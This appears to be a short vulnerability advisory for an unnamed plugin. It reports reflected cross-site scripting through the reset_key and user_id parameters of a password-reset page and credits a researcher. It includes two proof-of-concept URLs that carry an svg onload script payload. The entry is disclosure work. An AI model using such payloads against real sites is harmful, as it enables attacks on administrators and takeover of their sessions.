The plugin does not sanitise and escape the reset_key and user_id parameters before outputting then back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin
https://example.com/dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(/XSS/)%3E&user_id=dd https://example.com/dashboard/retrieve-password/?reset_key=a&user_id=%22%3E%3Csvg%20onload=prompt(/XSS/)%3E
So Sakaguchi
So Sakaguchi
Yes
2023-01-12 (about 4 months ago)
2023-01-12 (about 4 months ago)
2023-01-12 (about 4 months ago)